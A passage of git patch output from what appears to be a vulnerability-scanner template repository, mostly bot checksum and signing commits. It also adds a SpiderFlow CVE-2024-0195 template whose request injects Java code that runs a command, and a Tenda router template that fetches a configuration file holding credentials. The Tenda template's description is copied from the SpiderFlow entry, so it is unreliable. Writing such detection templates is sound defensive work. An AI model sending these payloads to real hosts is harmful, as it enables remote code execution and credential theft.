http/misconfiguration/installer/ruckus-smartzone-install.yaml:48c25f2717f5e5a62abc32cc50f61474534259c7 http/misconfiguration/installer/ruckus-unleashed-install.yaml:55ab5a07d38c07dc39480173dbcbbbcb4e297e5d @@ -6532,7 +6533,7 @@ http/takeovers/canny-takeover.yaml:cc5a760aa65559322a94344f7add91e523a63db1 http/takeovers/cargo-takeover.yaml:42db7ee4771a5cbddc6e2b8072070c583d6fd452 http/takeovers/cargocollective-takeover.yaml:dde78512f960c62936577c19801b1446ec65d5d3 http/takeovers/clever-takeover.yaml:f4d45f5b42f376d3258d2b4140a9dad14e25cd87 -http/takeovers/flexbe-takeover.yaml:bd450946fb6237dbf99f21409082be3ebb6d295b +http/takeovers/flexbe-takeover.yaml:e447e7c68c38eea9703f93af0b5560f9e10211ed http/takeovers/frontify-takeover.yaml:e7700c7ad9bb5a761d8bd1395c6a5360c91b3dcb http/takeovers/gemfury-takeover.yaml:69d22f9c935be01d0ebad5946a9766eafe12fc68 http/takeovers/getresponse-takeover.yaml:5eff48c5b7d27eeede3d2e7fba1a8a6f314fa9bd @@ -8554,7 +8555,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:913f630fde1f2c06c856ce79687ccd1f699ebd05 +templates-checksum.txt:a8e7df8690269ac44f7394cae540519848785f62 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7d4f403edffa1d43f18fe960eca9adb07f3ade92 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 08:56:10 +0000 Subject: [PATCH 1231/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 2da568ff08..1db8682e6e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -45,6 +45,7 @@ on: - 'http/misconfiguration/installer/octoprint-installer.yaml' - 'http/misconfiguration/installer/openfire-setup.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' + - 'http/misconfiguration/installer/qloapps-installer.yaml' - 'http/misconfiguration/installer/trilium-notes-installer.yaml' - 'http/misconfiguration/installer/wiki-js-installer.yaml' - 'http/misconfiguration/installer/xbackbone-installer.yaml' From 0ce959548fa691633e8ce005c11c09e6b075064d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 08:57:11 +0000 Subject: [PATCH 1232/1768] Auto Template Signing [Thu May 23 08:57:11 UTC 2024] :robot: --- http/cves/2023/CVE-2023-36284.yaml | 1 + http/cves/2024/CVE-2024-4956.yaml | 1 + http/misconfiguration/installer/qloapps-installer.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/http/cves/2023/CVE-2023-36284.yaml b/http/cves/2023/CVE-2023-36284.yaml index 92667d236c..dacbb3caae 100644 --- a/http/cves/2023/CVE-2023-36284.yaml +++ b/http/cves/2023/CVE-2023-36284.yaml @@ -57,3 +57,4 @@ http: - duration>=5 - 'contains(body, "<span>Guest Information")' condition: and +# digest: 490a0046304402202f3f74b2aa2805006791102f5519990f7d0e4824ad34b3c4abeed275fedb7caa02204b28c27e4cdb49f6286322ce20f2009ee727d644cfaa0880970674e4487400e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-4956.yaml b/http/cves/2024/CVE-2024-4956.yaml index b7acda2a48..2481ee7b18 100644 --- a/http/cves/2024/CVE-2024-4956.yaml +++ b/http/cves/2024/CVE-2024-4956.yaml @@ -39,3 +39,4 @@ http: - contains(header, "application/octet-stream") - status_code == 200 condition: and +# digest: 4b0a00483046022100d04cb6a8b4f715247f0046035995368961f1e380721d9a061a68fbcdf728ad70022100c807dbccfb625a6ee33ef8333433686a5a437f066cc9ecdd6c8a5aac4923bed9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/qloapps-installer.yaml b/http/misconfiguration/installer/qloapps-installer.yaml index 87064f012c..ac329ec307 100644 --- a/http/misconfiguration/installer/qloapps-installer.yaml +++ b/http/misconfiguration/installer/qloapps-installer.yaml @@ -30,3 +30,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100f3866d0a7114f2638451a3c05ef701c0dc2fc2e0d5a16f36b427743f28b16763022100ac4f98fcc0ddbdb5e562b07861b45a99fa1d3525cb1d8d031d3708a4db77558c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c36d1b9ad9a530202c7119fe811f2c69ec145981 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 09:32:12 +0000 Subject: [PATCH 1233/1768] Auto Generated Templates Checksum [Thu May 23 09:32:12 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 06d2d909fe..7bffb4c71f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3076,7 +3076,7 @@ http/cves/2023/CVE-2023-35843.yaml:f935ab47792f5daffb747a60564df573aea5b874 http/cves/2023/CVE-2023-35844.yaml:07feb73ed36aeaec344d8b1998c70aee8f8d9bd9 http/cves/2023/CVE-2023-35885.yaml:957a28f9f3f996307f32ae59a9f525b604092de2 http/cves/2023/CVE-2023-36144.yaml:152d855d93a2f729ac8765c3860a38fba7020624 -http/cves/2023/CVE-2023-36284.yaml:31cd0a9c8a9cef3a610f7481f8c2eb08a6e72161 +http/cves/2023/CVE-2023-36284.yaml:8b045d86f4ab7fd4d1dfb171450a2cc5bc9d270c http/cves/2023/CVE-2023-36287.yaml:95776d1420538a12d408f6ccd81aa83dc7d21a12 http/cves/2023/CVE-2023-36289.yaml:3d52b899da5c618c6e22f6d189e9be7ec5008206 http/cves/2023/CVE-2023-36306.yaml:3251b16b3918faf9a3c2ca2b070c0f205fc36e75 @@ -3302,7 +3302,7 @@ http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b -http/cves/2024/CVE-2024-4956.yaml:8fdaa2998b1f62c6e8fcfce8b198fa940cb2572f +http/cves/2024/CVE-2024-4956.yaml:930d1f49e8fdefd809f7aea2f0dddc2f3a160d09 http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -5418,6 +5418,7 @@ http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c http/misconfiguration/installer/gibbon-installer.yaml:c22815fca903475c70deeecb36bb5ca4bdde2283 http/misconfiguration/installer/gitea-installer.yaml:5e6a8a0d61e3cf52bdaeb96c7a1784a046292e7e http/misconfiguration/installer/gogs-installer.yaml:761e7ee7354915c029670f36c1360b8d8bb97a4d +http/misconfiguration/installer/growi-installer.yaml:743890ea534f511369a9d5e86d361189ac9e240b http/misconfiguration/installer/ids-skills-installer.yaml:ff7fee92596ae2212f48a0b75bfce6defd2f8baa http/misconfiguration/installer/impresspages-installer.yaml:a202181818bcfe8005a744f81027dc06de05dc40 http/misconfiguration/installer/imprivata-installer.yaml:876cea672f3efc0085a779a6d8c9305c994a2ea3 @@ -5467,7 +5468,7 @@ http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40 http/misconfiguration/installer/posteio-installer.yaml:d4662ebf401e1c2128570f674b63ccf25970599b http/misconfiguration/installer/prestashop-installer.yaml:5011384078f8708b8ec90caa52c299ecb922dea5 http/misconfiguration/installer/processwire-installer.yaml:77810f7d222228fb1c1afb38560135f4b7718d24 -http/misconfiguration/installer/qloapps-installer.yaml:2b6a9b4c991d5c1590fe3e66ecee08adbbcf655e +http/misconfiguration/installer/qloapps-installer.yaml:4cd9381f76856e1537af119a837b6e303bc97217 http/misconfiguration/installer/redash-installer.yaml:1087870f7e1826761d0ecbfbbc60528e43e028e0 http/misconfiguration/installer/ruckus-smartzone-install.yaml:48c25f2717f5e5a62abc32cc50f61474534259c7 http/misconfiguration/installer/ruckus-unleashed-install.yaml:55ab5a07d38c07dc39480173dbcbbbcb4e297e5d @@ -8555,7 +8556,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a8e7df8690269ac44f7394cae540519848785f62 +templates-checksum.txt:389baee3ddcffef703e3fd7ecba20ec318c44aa8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 311d3d623f656f7286107630513123f02c533317 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 09:33:54 +0000 Subject: [PATCH 1234/1768] Auto Template Signing [Thu May 23 09:33:54 UTC 2024] :robot: --- http/misconfiguration/installer/growi-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/growi-installer.yaml b/http/misconfiguration/installer/growi-installer.yaml index 905628e1c0..14ff7eaaf4 100644 --- a/http/misconfiguration/installer/growi-installer.yaml +++ b/http/misconfiguration/installer/growi-installer.yaml @@ -27,3 +27,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100f65be3a6050ddbda3b9523c2e10b58d2cf48ffbbd21f935a017e14dcc947acf9022100a34f8984e2df5cebba225562822b5b07470f28262216dfd247f81e9729e968a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 6964302bbde66b08699f9ea4f116a2c12f95816c Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 16:37:32 +0530 Subject: [PATCH 1235/1768] Create CVE-2024-0195.yaml --- http/cves/2024/CVE-2024-0195.yaml | 42 +++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2024/CVE-2024-0195.yaml diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml new file mode 100644 index 0000000000..cf2a26bb41 --- /dev/null +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -0,0 +1,42 @@ +id: CVE-2024-0195 + +info: + name: SpiderFlow Crawler Platform - Remote Code Execution + author: pussycat0x + severity: critical + description: | + A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability. + reference: + - https://github.com/Shelter1234/VulneraLab/blob/main/SpiderFlow/CVE-2024-0195/README.zh-cn.md + - https://github.com/wy876/wiki + - https://github.com/xingchennb/POC- + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-0195 + cwe-id: CWE-94 + epss-score: 0.00107 + epss-percentile: 0.43408 + cpe: cpe:2.3:a:ssssssss:spider-flow:0.4.3:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: ssssssss + product: spider-flow + fofa-query: app="SpiderFlow" + +http: + - raw: + - | + POST /function/save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + + id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+{{interactsh-url}}')%3B%7B + + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" From 594c949fc01a1e4512cb03d7443f03e8c6edc8d1 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 16:51:12 +0530 Subject: [PATCH 1236/1768] Update CVE-2024-0195.yaml --- http/cves/2024/CVE-2024-0195.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index cf2a26bb41..c8a0ee3d6b 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -32,7 +32,7 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest - + id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+{{interactsh-url}}')%3B%7B matchers: From b5ecce44ecc97b6b24faedb88bb346adb3b43851 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 17:14:20 +0530 Subject: [PATCH 1237/1768] Create tendat-credential.yaml --- .../other/tendat-credential.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/vulnerabilities/other/tendat-credential.yaml diff --git a/http/vulnerabilities/other/tendat-credential.yaml b/http/vulnerabilities/other/tendat-credential.yaml new file mode 100644 index 0000000000..fe00f615e4 --- /dev/null +++ b/http/vulnerabilities/other/tendat-credential.yaml @@ -0,0 +1,32 @@ +id: tendat-credential + +info: + name: TendaT Router Credential Exposure + author: pussycat0x + severity: high + description: | + A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability. + reference: + - https://github.com/wy876/POC/blob/main/Tenda%E8%B7%AF%E7%94%B1%E5%99%A8%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2.md + metadata: + verified: true + fofa-query: title="Tenda | LOGIN" && country="CN" + +http: + - raw: + - | + GET /cgi-bin/DownloadCfg/RouterCfm.jpg HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + + matchers-condition: and + matchers: + - type: word + words: + - "http_username" + - "device_remark" + condition: and + + - type: status + status: + - 200 From 33edf377cd5199e2ec46cc0b32c2622ce90f3185 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 17:33:57 +0530 Subject: [PATCH 1238/1768] Update robomongo-credential.yaml --- http/exposures/configs/robomongo-credential.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/configs/robomongo-credential.yaml b/http/exposures/configs/robomongo-credential.yaml index eb25a0d5f3..45cc6aacdc 100644 --- a/http/exposures/configs/robomongo-credential.yaml +++ b/http/exposures/configs/robomongo-credential.yaml @@ -1,7 +1,7 @@ id: robomongo-credential info: - name: RoboMongo Configuration File - Detect + name: RoboMongo Credential Exposure author: geeknik severity: high description: A MongoDB credentials file used by RoboMongo was detected. From 2a36cb0922dae124f55c5ea2954bb2202816d2c0 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 17:34:29 +0530 Subject: [PATCH 1239/1768] Update kyan-credential-exposure.yaml --- http/exposures/configs/kyan-credential-exposure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/configs/kyan-credential-exposure.yaml b/http/exposures/configs/kyan-credential-exposure.yaml index a5f3c19c03..65905cc57e 100644 --- a/http/exposures/configs/kyan-credential-exposure.yaml +++ b/http/exposures/configs/kyan-credential-exposure.yaml @@ -1,7 +1,7 @@ id: kyan-credential-exposure info: - name: Kyan Network Login Panel - Detect + name: Kyan Credential Exposure author: pikpikcu severity: medium description: Kyan Network login panel was detected. Password and other credential theft is possible via accessing this panel. From d5c2203079d85e6e379d4f9f13701a131b43626b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 23 May 2024 17:44:44 +0530 Subject: [PATCH 1240/1768] Update robomongo-credential.yaml --- .../configs/robomongo-credential.yaml | 20 +++++++++++-------- 1 file changed, 12 insertions(+), 8 deletions(-) diff --git a/http/exposures/configs/robomongo-credential.yaml b/http/exposures/configs/robomongo-credential.yaml index 45cc6aacdc..029b5d6c3c 100644 --- a/http/exposures/configs/robomongo-credential.yaml +++ b/http/exposures/configs/robomongo-credential.yaml @@ -1,11 +1,13 @@ id: robomongo-credential info: - name: RoboMongo Credential Exposure + name: RoboMongo Credential - Exposure author: geeknik severity: high - description: A MongoDB credentials file used by RoboMongo was detected. - reference: https://robomongo.org/ + description: | + A MongoDB credentials file used by RoboMongo was detected. + reference: + - https://robomongo.org/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -20,13 +22,10 @@ http: - "{{BaseURL}}/db/robomongo.json" - "{{BaseURL}}/robomongo.json" + stop-at-first-match: true + matchers-condition: and matchers: - - type: word - part: header - words: - - "application/json" - - type: word words: - "databaseName" @@ -35,6 +34,11 @@ http: - "serverHost" condition: and + - type: word + part: header + words: + - "application/json" + - type: status status: - 200 From 7895921867c6384ebbb0aa73bfb00b5dfda9794d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 23 May 2024 17:45:15 +0530 Subject: [PATCH 1241/1768] Update kyan-credential-exposure.yaml --- http/exposures/configs/kyan-credential-exposure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/configs/kyan-credential-exposure.yaml b/http/exposures/configs/kyan-credential-exposure.yaml index 65905cc57e..9de83418c6 100644 --- a/http/exposures/configs/kyan-credential-exposure.yaml +++ b/http/exposures/configs/kyan-credential-exposure.yaml @@ -1,7 +1,7 @@ id: kyan-credential-exposure info: - name: Kyan Credential Exposure + name: Kyan Credential - Exposure author: pikpikcu severity: medium description: Kyan Network login panel was detected. Password and other credential theft is possible via accessing this panel. From c783d96af722e869d54739e58253db97d0839b24 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 12:17:39 +0000 Subject: [PATCH 1242/1768] Auto Generated New Template Addition List [Thu May 23 12:17:39 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cae8693827..8f5bb60413 100644 --- a/.new-additions +++ b/.new-additions @@ -35,6 +35,7 @@ http/misconfiguration/installer/custom-xoops-installer.yaml http/misconfiguration/installer/easy-viserlabs-installer.yaml http/misconfiguration/installer/forgejo-installer.yaml http/misconfiguration/installer/froxlor-installer.yaml +http/misconfiguration/installer/growi-installer.yaml http/misconfiguration/installer/ids-skills-installer.yaml http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/octoprint-installer.yaml From 13db02e8edffcc596d7078bfa4c543d85068b566 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 12:17:58 +0000 Subject: [PATCH 1243/1768] Auto Generated Templates Checksum [Thu May 23 12:17:58 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7bffb4c71f..69352264ee 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4727,7 +4727,7 @@ http/exposures/configs/rackup-config-ru.yaml:94f7f7fc3cc26030ca1630f9d782eeeb7d1 http/exposures/configs/rails-database-config.yaml:b02dca967dbd26612f29e13205e41e8377670897 http/exposures/configs/rakefile-disclosure.yaml:40d258c4d79613a96e9e09bfb1c940755956546b http/exposures/configs/redis-config.yaml:91875ce839649f48da4ed29d68a72f2c1ee5a1e8 -http/exposures/configs/robomongo-credential.yaml:5798cce171c0a0763983e954747483a4b25e34f6 +http/exposures/configs/robomongo-credential.yaml:af056f027abbdab368dbaed618eb3ba20581dbb3 http/exposures/configs/rollup-js-config.yaml:8f2034228d8e39391f1527030b8887cb95c8d012 http/exposures/configs/rubocop-config.yaml:c4f570275da1ebe7f348c6a77006c6d26d06e711 http/exposures/configs/ruijie-information-disclosure.yaml:8b2cde25db83e7d577878b09ef7dca415fab1046 @@ -5418,7 +5418,7 @@ http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c http/misconfiguration/installer/gibbon-installer.yaml:c22815fca903475c70deeecb36bb5ca4bdde2283 http/misconfiguration/installer/gitea-installer.yaml:5e6a8a0d61e3cf52bdaeb96c7a1784a046292e7e http/misconfiguration/installer/gogs-installer.yaml:761e7ee7354915c029670f36c1360b8d8bb97a4d -http/misconfiguration/installer/growi-installer.yaml:743890ea534f511369a9d5e86d361189ac9e240b +http/misconfiguration/installer/growi-installer.yaml:4deae8663c130d2b6fa7d6c62da70b3474c2efb3 http/misconfiguration/installer/ids-skills-installer.yaml:ff7fee92596ae2212f48a0b75bfce6defd2f8baa http/misconfiguration/installer/impresspages-installer.yaml:a202181818bcfe8005a744f81027dc06de05dc40 http/misconfiguration/installer/imprivata-installer.yaml:876cea672f3efc0085a779a6d8c9305c994a2ea3 @@ -8556,7 +8556,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:389baee3ddcffef703e3fd7ecba20ec318c44aa8 +templates-checksum.txt:627e7da79707c2c86dfef54ba9353e342fbb82db wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 50b272704400859ae6c4b5ce70be69f65f787086 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 12:18:19 +0000 Subject: [PATCH 1244/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 1db8682e6e..cfc66bd726 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -40,6 +40,7 @@ on: - 'http/misconfiguration/installer/easy-viserlabs-installer.yaml' - 'http/misconfiguration/installer/forgejo-installer.yaml' - 'http/misconfiguration/installer/froxlor-installer.yaml' + - 'http/misconfiguration/installer/growi-installer.yaml' - 'http/misconfiguration/installer/ids-skills-installer.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/octoprint-installer.yaml' From adaf6da3aa43b413c21dd5eea4b08006e53475fc Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 12:18:31 +0000 Subject: [PATCH 1246/1768] Auto Generated Templates Checksum [Thu May 23 12:18:31 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 69352264ee..0fe3d41f5c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4684,7 +4684,7 @@ http/exposures/configs/jsconfig-json.yaml:2b4eef2963c707feef05c1953816da94d1a331 http/exposures/configs/karma-config-js.yaml:0ef25cc1986c133be7cba2144ecd6cc287c3c4b9 http/exposures/configs/keycloak-openid-config.yaml:42ffdd485eb9de21b1cfdc3c631e384151ad5281 http/exposures/configs/kubernetes-kustomization-disclosure.yaml:eb652b556472ef31b9d25b651c66780796ef87fa -http/exposures/configs/kyan-credential-exposure.yaml:361f8767da9a8f50f3dd85a8f04a7c228badcac2 +http/exposures/configs/kyan-credential-exposure.yaml:8fa3cc4b02e0d50fd78a3a033d8fd799d17af82e http/exposures/configs/laravel-env.yaml:f3071adfe9141a9fdf4b7ddf913a1b05118ab9d0 http/exposures/configs/lvmeng-uts-disclosure.yaml:cc8d43b2cd08dc0ba883f385679681598ec373b2 http/exposures/configs/magento-config-disclosure.yaml:c7ed206ff84ae43bb9bbae4ddbc8e5354558076a @@ -8556,7 +8556,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:627e7da79707c2c86dfef54ba9353e342fbb82db +templates-checksum.txt:1b6bff8175b179836c5ac85910f593e2d559d909 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 0c4bce54ae870e51ddbe954bd5176214da60f94d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 12:19:25 +0000 Subject: [PATCH 1247/1768] Auto Template Signing [Thu May 23 12:19:25 UTC 2024] :robot: --- http/exposures/configs/robomongo-credential.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/exposures/configs/robomongo-credential.yaml b/http/exposures/configs/robomongo-credential.yaml index 029b5d6c3c..d4d0eaa379 100644 --- a/http/exposures/configs/robomongo-credential.yaml +++ b/http/exposures/configs/robomongo-credential.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a091fec38f4647a645665c8ba770105c82fd3c1e4c83b22074900e112e73a44f022100e3836c37d83ecae0eca80a9c63b2ec583a711c0c2fa3fc33a0d584b643bf39dc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ec83814bf87d0df0c3d2fdda4ed2be1b96cbb72daeee2aeb81f148c0b61f8bdb0220752c79df054df4bb24b5f756d21d318b0adcfbc7cee148e412b0ade02cd8ebcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8062ccd219843eb4a71710e90e339cae9b00a480 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 23 May 2024 17:50:39 +0530 Subject: [PATCH 1248/1768] updated matchers --- .../other/tendat-credential.yaml | 18 +++++++----------- 1 file changed, 7 insertions(+), 11 deletions(-) diff --git a/http/vulnerabilities/other/tendat-credential.yaml b/http/vulnerabilities/other/tendat-credential.yaml index fe00f615e4..fb861b702d 100644 --- a/http/vulnerabilities/other/tendat-credential.yaml +++ b/http/vulnerabilities/other/tendat-credential.yaml @@ -1,7 +1,7 @@ id: tendat-credential info: - name: TendaT Router Credential Exposure + name: Tendat Router Credential - Exposure author: pussycat0x severity: high description: | @@ -11,22 +11,18 @@ info: metadata: verified: true fofa-query: title="Tenda | LOGIN" && country="CN" + tags: tendat,exposure,config http: - raw: - | GET /cgi-bin/DownloadCfg/RouterCfm.jpg HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - matchers-condition: and matchers: - - type: word - words: - - "http_username" - - "device_remark" + - type: dsl + dsl: + - 'contains_all(body, "http_username", "device_remark")' + - 'contains(header, "config/conf")' + - 'status_code == 200' condition: and - - - type: status - status: - - 200 From b71e994bdc59f9355f40b1476634eac5c3de5623 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 23 May 2024 12:24:54 +0000 Subject: [PATCH 1249/1768] Auto Generated New Template Addition List [Thu May 23 12:24:54 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 8f5bb60413..6fcf5e4107 100644 --- a/.new-additions +++ b/.new-additions @@ -57,4 +57,5 @@ http/technologies/tinyproxy-detect.yaml http/technologies/uni-gui-framework.yaml http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml http/vulnerabilities/other/castel-digital-sqli.yaml +http/vulnerabilities/other/tendat-credential.yaml javascript/enumeration/checkpoint-firewall-enum.yaml From ce93b053d5d0a0aa58dd5b5785c5b23b6c30f890 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 23 May 2024 